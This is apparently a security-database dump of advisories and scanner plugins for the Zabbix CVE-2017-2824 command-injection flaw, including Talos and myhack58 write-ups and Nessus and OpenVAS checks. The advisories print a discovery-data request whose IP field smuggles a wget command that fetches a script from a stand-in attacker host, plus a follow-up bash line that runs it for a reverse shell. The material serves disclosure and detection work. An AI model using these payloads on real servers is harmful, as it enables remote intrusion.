script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:50:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-12 00:00:00 +0200 (Sat, 12 Aug 2017)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2017/dsa-3937.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"zabbix on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (jessie), these problems have been fixed\nin version 1:2.2.7+dfsg-2+deb8u3.\n\nFor the stable distribution (stretch), these problems have been fixed\nprior to the initial release.\n\nWe recommend that you upgrade your zabbix packages.\");\n script_tag(name:\"summary\", value:\"Lilith Wyatt discovered two vulnerabilities in the Zabbix network\nmonitoring system which may result in execution of arbitrary code or\ndatabase writes by malicious proxies.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"zabbix-agent\", ver:\"1:2.2.7+dfsg-2+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"zabbix-frontend-php\", ver:\"1:2.2.7+dfsg-2+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"zabbix-java-gateway\", ver:\"1:2.2.7+dfsg-2+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"zabbix-proxy-mysql\", ver:\"1:2.2.7+dfsg-2+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"zabbix-proxy-pgsql\", ver:\"1:2.2.7+dfsg-2+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"zabbix-proxy-sqlite3\", ver:\"1:2.2.7+dfsg-2+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"zabbix-server-mysql\", ver:\"1:2.2.7+dfsg-2+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"zabbix-server-pgsql\", ver:\"1:2.2.7+dfsg-2+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "myhack58": [{"lastseen": "2017-04-27T21:21:05", "bulletinFamily": "info", "cvelist": ["CVE-2017-2824"], "edition": 1, "description": "About Zabbix \nzabbix is a WEB-based interface to provide distributed system monitoring and network monitoring capabilities of enterprise-class open source solutions. \nzabbix to monitor various network parameters, ensure that the server system of the security operations;and to provide flexible notification mechanism to allow system administrators to quickly locate/solve the existing issues. \nVulnerability description \nZabbix Server Active Proxy Trapper remote code execution vulnerability (CVE-2017-2824) \nZabbix 2.4. x in the trapper command function there is a code execution vulnerability, a particular data packet can cause command injection, and then remotely execute code, an attacker can be from a Zabbix proxy to initiate a request to trigger the vulnerability. \nMitigation measures \nRemove the Zabbix database in the default script entry, you can directly manipulate the database to remove the sql is: use zabbix; delete * from scripts; can also use the graphical interface to delete (Administration-&gt;Scripts-&gt;Checkmarks-&gt;Delete Selected). \n\nZabbix Proxy database write Vulnerability(CVE-2017-2824) \nZabbix 2.4. x in the trapper function there is a database write vulnerability-specific malware trapper data packet through the database logic checks, cause the database is written, an attacker can MiTM a way to modify the zabbix proxy and the Server between the request to trigger the vulnerability. \nImpact version \nZabbix 2.4.7 - 2.4. 8r1 \n\n", "modified": "2017-04-28T00:00:00", "published": "2017-04-28T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/85663.htm", "id": "MYHACK58:62201785663", "type": "myhack58", "title": "Zabbix multiple high-risk vulnerabilities-vulnerability warning-the black bar safety net", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-05-01T09:23:37", "bulletinFamily": "info", "cvelist": ["CVE-2017-2824"], "edition": 1, "description": "! [](/Article/UploadPic/2017-5/201751153839393. jpg? www. myhack58. com) \nAbout Zabbix \nzabbix is a WEB-based interface to provide distributed system monitoring and network monitoring capabilities of enterprise-class open source solutions. \nzabbix to monitor various network parameters, ensure that the server system of the security operations;and to provide flexible notification mechanism to allow system administrators to quickly locate/solve the existing issues. \nVulnerability description \nZabbix Server Active Proxy Trapper remote code execution vulnerability (CVE-2017-2824)\u2605\u2605\u2605\u2605 \nZabbix 2.4. x in the trapper command function there is a code execution vulnerability, a particular data packet can cause command injection, and then remotely execute code, an attacker can be from a Zabbix proxy to initiate a request to trigger the vulnerability. \nVulnerability details \nThe vulnerability in Zabbix in the\u201cTrapper\u201dpart of the code, its main function is to allow the Proxy and the Server communicate network services, TCP port 10051\uff09Zabbix Server provides a set for the Zabbix Proxy the API calls, the two will discuss the\u201cdiscovery data\u201dand\u201crequest command\u201dis. These requests are examples of data as shown below: \n'{\"request\":\"command\",\"scriptid\":1,\"hostid\":10001}' \n'{\"request\":\"discovery data\",\"host\":\"zabbix-proxy.com\",\"clock\":10, \n\"data\":[{\"clock\":10,\"drule\":1,\"dcheck2,\"type\":0,\"ip:10.0.0.1, \"dns\":\"zabbix-agent.com\", port\":10050,\"key\":\"test\",\"status\":0,\"value\":\"test_value\"}]} \nIt should be noted that, the request command to call is located in the Zabbix database in a script, without performing any authentication. The vulnerability another key aspect is that by default, the Zabbix 2.4. X using the script below in the table 3 the script to populate the MySQL database: \n# scriptid == 1 == /bin/ping-c {HOST. CONN} 2&gt;&amp;1 \n# scriptid == 2 == /usr/bin/traceroute {HOST. CONN} 2&gt;&amp;1 \n# scriptid == 3 == sudo /usr/bin/nmap-O {HOST. CONN} 2&gt;&amp;1 \nThe problem is that, in the calling Script, {HOST. CONN}field is actually the host of the IP address replacement. Replace{HOST. CONN}the value located in the Zabbixinterface table, and then save it as VARCHAR\uff0864\uff09type the\u201cIP\u201dfield. Therefore, if the attacker can use the command injection to create an interface as the IP address, and by\u201ccommand\u201drequest is running on{HOST. CONN}script, then the occurrence of command injection, and you can get a reverse shell. \nThe problem is that effectively the value is inserted into the Zabbixhost table. By default, unauthenticated attacker can not do this, it needs the system administrator of a secondary configuration, especially on the Zabbix auto-discovery function. \nZabbix auto-discovery and auto-registration function is allowed according to the Zabbix Proxy provides the Zabbix Server data to the Zabbix Server Configuration. More specifically, if the host according to the configuration of the server to the Zabbix Proxy provides certain characteristics, it may take certain actions, one will make the new discovered hosts are added to some of the Zabbix database tables. In this case, the host will be inserted into the\u201chost\u201dtable, and will create an entrance to the Zabbixinterface in the table, the host provides the IP address into the IP column, and not the IP address of any verification. \nTherefore, by using a suitable host to the server to send a discovery data request, commands can be injected into the database: \nwrite_script_cmd='{ \n\"request\":\"discoverydata\", \n\"host\":\"zabbix-proxy. domain. fake\", \n\"clock\":148535399, \n\"data\":[{ \n\"clock\":1485353070, \n\"drule\":88, \n\"dcheck\":174, \n\"type\":0, \n\"ip\":\";wget-O/tmp/shttp://attacker-ip/s;#\", \n\"dns\":\"host28. domain. fake\", \n\"port\":10050, \n\"key\":\"sectest\", \n\"status\":0, \n\"value\":\"lnxhost\" \n}]}' \nDue to the ZabbixInterface table ip field size limit, the second host is inserted into another IP address table. \n// The Host 2 \nip:/bin/bash /tmp/s;# \nIn this two host is added thereafter, there is still a problem that don't know the hostid command request, but this is easily solved. Violence request into the database, because a different command requests will return a different response, determining whether the host exists, once the presence of the host is determined, you can call them directly, and you can get a reverse shell. The command request is shown below \nrun_cmd = '{ \n\"request\":\"command\", \n\"scriptid\":1, \n\"hostid\":14666 \n}' \n\nMitigation measures \nRemove the Zabbix database in the default script entry, you can directly manipulate the database to remove the sql is: use zabbix; delete * from scripts; can also use the graphical interface to delete (Administration-&gt;Scripts-&gt;Checkmarks-&gt;Delete Selected). \n\nZabbix Proxy database write Vulnerability(CVE-2017-2824) \nZabbix 2.4. x in the trapper function there is a database write vulnerability-specific malware trapper data packet through the database logic checks, cause the database is written, an attacker can MiTM a way to modify the zabbix proxy and the Server between the request to trigger the vulnerability. \nImpact version \nZabbix 2.4.7 - 2.4. 8r1 \nReference \nhttp://blog.talosintelligence.com/2017/04/zabbix-multiple-vulns.html \nhttp://www.talosintelligence.com/reports/TALOS-2017-0325/ \nhttp://www.talosintelligence.com/reports/TALOS-2017-0326/ \nhttps://support.zabbix.com/browse/ZBX-12075 \nhttps://support.zabbix.com/browse/ZBX-12076 \n\n", "modified": "2017-05-01T00:00:00", "published": "2017-05-01T00:00:00", "id": "MYHACK58:62201785725", "href": "http://www.myhack58.com/Article/html/3/62/2017/85725.htm", "title": "Zabbix blast remote code execution vulnerability, a database written in a high-risk vulnerability-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}], "freebsd": [{"lastseen": "2019-05-29T18:32:12", "bulletinFamily": "unix", "cvelist": ["CVE-2017-2824"], "description": "\nmitre reports:\n\nAn exploitable code execution vulnerability exists in the trapper command\n\t functionality of Zabbix Server 2.4.X. A specially crafted set of packets\n\t can cause a command injection resulting in remote code execution. An attacker\n\t can make requests from an active Zabbix Proxy to trigger this vulnerability.\n\n", "edition": 4, "modified": "2017-07-05T00:00:00", "published": "2017-07-05T00:00:00", "id": "5DF8BD95-8290-11E7-93AF-005056925DB4", "href": "https://vuxml.freebsd.org/freebsd/5df8bd95-8290-11e7-93af-005056925db4.html", "title": "Zabbix -- Remote code execution", "type": "freebsd", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "talos": [{"lastseen": "2020-07-01T21:25:08", "bulletinFamily": "info", "cvelist": ["CVE-2017-2824"], "description": "# Talos Vulnerability Report\n\n### TALOS-2017-0325\n\n## Zabbix Server Active Proxy Trapper Remote Code Execution Vulnerability\n\n##### April 27, 2017\n\n##### CVE Number\n\nCVE-2017-2824\n\n### Summary\n\nAn exploitable code execution vulnerability exists in the trapper command functionality of Zabbix Server 2.4.X . A specially crafted set of packets can cause a command injection resulting in remote code execution. An attacker can make requests from an active Zabbix Proxy to trigger this vulnerability.\n\n### Tested Versions\n\nZabbix Server 2.4.8.r1\n\n### Product URLs\n\n[http://www.zabbix.com](<https://www.zabbix.com/download>)\n\n### CVSSv3 Score\n\n9.0 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H\n\n### CWE\n\nCWE-88: Argument Injection or Modification\n\n### Details\n\nThe vulnerability lies within the \u00ecTrapper\u00ee section of the Zabbix Code, this is the network service that allows the Proxies and the Server to communicate (TCP Port 10051) There are a set of API calls that the Zabbix Server exposes to the Zabbix proxy, the two that will be discussed are the \u00ecdiscovery data\u00ee and \u00eccommand\u00ee requests. Example data of these requests are shown below:\n \n \n '{\"request\":\"command\",\"scriptid\":1,\"hostid\":10001}'\n \n '{\"request\":\"discovery data\",\"host\":\"zabbix-proxy.com\",\"clock\":10,\n \"data\":[{\"clock\":10,\"drule\":1,\"dcheck2,\"type\":0,\"ip\u00ee:\u00ee10.0.0.1\u00ee, \"dns\":\"zabbix-agent.com\", \t\u00ecport\":10050,\"key\":\"test\",\"status\":0,\"value\":\"test_value\"}]}\n \n\nIt should be noted that the \u00ecrequest\u00ee command invokes a script located in the Zabbix database without any authentication occurring (which might be considered a bug in itself).\n\nAnother pivotal aspect of the vulnerability is that by default, Zabbix 2.4.X populates the MySQL database with 3 scripts inside of the scripts table:\n \n \n # scriptid == 1 == /bin/ping -c {HOST.CONN} 2>&1\n # scriptid == 2 == /usr/bin/traceroute {HOST.CONN} 2>&1\n # scriptid == 3 == sudo /usr/bin/nmap -O {HOST.CONN} 2>&1\n \n\nThe problem lies in the fact that the {HOST.CONN} field actually gets replaced by the host\u00eds IP address during the invocation of the script. The value that replaces {HOST.CONN} is located in the Zabbix \u00ecinterface\u00ee table, and is stored as the \u00ecIP\u00ee field as a VARCHAR(64). Thus, if an attacker can create an interface with a command injection as the IP address, and script with {HOST.CONN} is run via the \u00eccommand\u00ee request, the command injection will occur and a reverse shell can be gained.\n\nThe difficulty lies in actually getting a valid entry into the Zabbix \u00echost\u00ee table. By default, an unauthenticated attacker cannot do this, it requires a minor configuration on the part of the system administrators, specifically in regards to Zabbix\u00eds Auto-discovery feature.\n\nZabbix\u00eds Auto-discovery and Auto-registration features allow for configuration of the Zabbix Server to occur based on the data presented Zabbix Server by the Zabbix Proxy. More specifically, if a hosts presents certain characteristics to the Zabbix Proxy, based on the configuration of the server, certain actions could be potentially taken, one of which causes the newly discovered host to get added to certain Zabbix database tables. When this occurs, a host is inserted into the \u00echosts\u00ee table and also an entry into the Zabbix \u00ecinterface\u00ee table will be created, with the IP address presented by the host being inserted into the IP column, without any validation of that IP address occurring.\n\nThus, by sending a \u00ecdiscovery data\u00ee request to the server with a suitable host, a command injection can be inserted into the database:\n \n \n write_script_cmd\t=\t'{\n \t\"request\":\"discovery\tdata\",\n \t\"host\":\"zabbix-proxy.domain.fake\",\n \t\"clock\":148535399,\t\n \t\"data\":[{\n \t\"clock\":1485353070,\n \t\"drule\":88,\n \t\"dcheck\":174,\n \t\"type\":0,\n \t\"ip\":\";wget -O\t/tmp/s\thttp://attacker-ip/s;#\",\t\t\t\t\t\t\t\n \t\"dns\":\"host28.domain.fake\",\n \t\"port\":10050,\n \t\"key\":\"sectest\",\n \t\"status\":0,\n \t\"value\":\"lnx<(^_^)>host\"\n }]}'\t\n \n\nDue to the size limitation of the \u00ebip\u00ed field of the Zabbix \u00ecInterface\u00ee table, a second host was inserted into the table with another IP address.\n \n \n // Host 2\n \u00ecip\u00ee:\u00ee;/bin/bash /tmp/s;#\u00ee\n \n\nAfter these two hosts were added, there was still the issue of not knowing the hostid\u00eds for the \u00eccommand\u00ee request, but this was easily solved by brute forcing backwards into the database since the command request would return a different response if the host actually existed or not, and once the hostid\u00eds of the injected hosts were known, they could be invoked directly, and a reverse shell could be gained.\n\n### Mitigation\n\nBy removing the three default script entries inside of the Zabbix Server\u00eds \u00ecZabbix\u00ee database, an attacker would be unable to actually execute code, even if they can insert hosts with spoofed addresses into the database. This should not affect an organizations current operations, unless teh scripts are actually used. This proposed fix can either be done directly from the database (use zabbix; delete * from scripts;) or from the GUI interface (Administration -&gt; Scripts -&gt; Checkmarks -&gt; \u00ecDelete Selected\u00ee/\u00eeGo\u00ee).\n\n### Timeline\n\n2017-03-22 - Vendor Disclosure \n2017-04-27 - Public Release\n\n##### Credit\n\nDiscovered by Lilith Wyatt of Cisco ASIG\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2017-0326\n\nPrevious Report\n\nTALOS-2017-0310\n", "edition": 11, "modified": "2017-04-27T00:00:00", "published": "2017-04-27T00:00:00", "id": "TALOS-2017-0325", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0325", "title": "Zabbix Server Active Proxy Trapper Remote Code Execution Vulnerability", "type": "talos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-01T07:01:18", "description": "The Zabbix server running on the remote host is affected by a remote\ncommand injection vulnerability due to the failure to sanitize the\ninput data involving an IP address that would go into the 'ip' field \nof the 'interface' table in the 'zabbix' database. An unauthenticated,\nremote attacker can exploit this, via specially crafted packets, to\nexecute OS commands.\n\nNote that Zabbix server is reportedly affected by additional\nvulnerabilities; however, this plugin has not tested for these", "edition": 25, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-06T00:00:00", "title": "Zabbix Server 'active checks' Command Injection", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2824"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:zabbix:zabbix"], "id": "ZABBIX_SERVER_CVE-2017-2824.NASL", "href": "https://www.tenable.com/plugins/nessus/105042", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105042);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/11/15 20:50:24\");\n\n script_cve_id(\"CVE-2017-2824\");\n script_bugtraq_id(98083);\n\n script_name(english:\"Zabbix Server 'active checks' Command Injection\");\n script_summary(english:\"Checks response for an 'active checks' request.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A network monitoring application running on the remote host is\naffected by a remote command injection vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Zabbix server running on the remote host is affected by a remote\ncommand injection vulnerability due to the failure to sanitize the\ninput data involving an IP address that would go into the 'ip' field \nof the 'interface' table in the 'zabbix' database. An unauthenticated,\nremote attacker can exploit this, via specially crafted packets, to\nexecute OS commands.\n\nNote that Zabbix server is reportedly affected by additional\nvulnerabilities; however, this plugin has not tested for these\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.zabbix.com/browse/ZBX-12075\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zabbix.com/rn/rn3.2.7\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zabbix.com/rn/rn3.0.10\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zabbix.com/rn/rn2.2.19\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Zabbix version 3.4.0 / 3.2.7 / 3.0.10 / 2.2.19 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zabbix:zabbix\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"zabbix_server_detect.nasl\");\n script_require_ports(\"Services/zabbix_server\", 10051);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"dump.inc\");\ninclude(\"audit.inc\");\n\nport = get_service(svc:'zabbix_server', default: 10051, exit_on_fail:TRUE);\n\nsoc = open_sock_tcp(port);\nif (!soc) audit(AUDIT_SOCK_FAIL, port);\n\n# Specify both invalid 'host' and 'ip'\n# Valid chars in 'host' are: '0-9a-zA-Z. _-'\ninvalid_host = '$' + SCRIPT_NAME + '$';\ninvalid_ip = SCRIPT_NAME;\n\nreq ='{\"request\":\"active checks\", \"host\":\"' + \n invalid_host + '\",\"ip\":\"' +\n invalid_ip + '\"}';\n\nsend(socket:soc, data:req);\nres = recv(socket:soc, length:256);\n\nif (! isnull(res))\n{\n if(res =~ '^ZBXD')\n {\n # Patched server checks 'ip' first before checking 'host'\n if ('not a valid IP address' >< res)\n {\n audit(AUDIT_LISTEN_NOT_VULN, 'Zabbix server', port); \n }\n # Vulnerable server doesn't check 'ip'\n else if ('invalid host name' >< res)\n {\n security_report_v4(port: port, severity: SECURITY_WARNING);\n }\n else\n {\n audit(AUDIT_RESP_BAD, port, \"an 'active checks' request. Unexpected response:\" + '\\n' + hexdump(ddata: res) + '\\n'); \n }\n }\n else\n {\n audit(AUDIT_RESP_BAD, port, \"an 'active checks' request: bad Zabbix protocol header\"); \n }\n}\nelse\n{\n audit(AUDIT_RESP_NOT, port, \"an 'active checks' request\"); \n}\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T10:52:15", "description": "mitre reports :\n\nAn exploitable code execution vulnerability exists in the trapper\ncommand functionality of Zabbix Server 2.4.X. A specially crafted set\nof packets can cause a command injection resulting in remote code\nexecution. An attacker can make requests from an active Zabbix Proxy\nto trigger this vulnerability.", "edition": 25, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-08-17T00:00:00", "title": "FreeBSD : Zabbix -- Remote code execution (5df8bd95-8290-11e7-93af-005056925db4)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2824"], "modified": "2017-08-17T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:zabbix32-server", "p-cpe:/a:freebsd:freebsd:zabbix3-server", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:zabbix22-server", "p-cpe:/a:freebsd:freebsd:zabbix22-proxy", "p-cpe:/a:freebsd:freebsd:zabbix2-server", "p-cpe:/a:freebsd:freebsd:zabbix3-proxy", "p-cpe:/a:freebsd:freebsd:zabbix32-proxy", "p-cpe:/a:freebsd:freebsd:zabbix2-proxy"], "id": "FREEBSD_PKG_5DF8BD95829011E793AF005056925DB4.NASL", "href": "https://www.tenable.com/plugins/nessus/102530", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102530);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2017-2824\");\n\n script_name(english:\"FreeBSD : Zabbix -- Remote code execution (5df8bd95-8290-11e7-93af-005056925db4)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"mitre reports :\n\nAn exploitable code execution vulnerability exists in the trapper\ncommand functionality of Zabbix Server 2.4.X. A specially crafted set\nof packets can cause a command injection resulting in remote code\nexecution. An attacker can make requests from an active Zabbix Proxy\nto trigger this vulnerability.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.zabbix.com/browse/ZBX-12349\"\n );\n # https://vuxml.freebsd.org/freebsd/5df8bd95-8290-11e7-93af-005056925db4.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?795d7f75\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:zabbix2-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:zabbix2-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:zabbix22-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:zabbix22-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:zabbix3-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:zabbix3-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:zabbix32-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:zabbix32-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"zabbix2-server<=2.0.20\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"zabbix2-proxy<=2.0.20\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"zabbix22-server<2.2.19\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"zabbix22-proxy<2.2.19\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"zabbix3-server<3.0.10\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"zabbix3-proxy<3.0.10\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"zabbix32-server<3.2.7\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"zabbix32-proxy<3.2.7\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:14:05", "description": "- http://www.zabbix.com/rn3.0.8\n\n- http://www.zabbix.com/rn3.0.9\n\n- https://www.zabbix.com/documentation/3.0/manual/introduction/whatsnew308\n\n- https://www.zabbix.com/documentation/3.0/manual/introduction/whatsnew309\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 18, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-07-03T00:00:00", "title": "Fedora 24 : zabbix (2017-d191fb7fce)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2824"], "modified": "2017-07-03T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:zabbix", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2017-D191FB7FCE.NASL", "href": "https://www.tenable.com/plugins/nessus/101184", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network 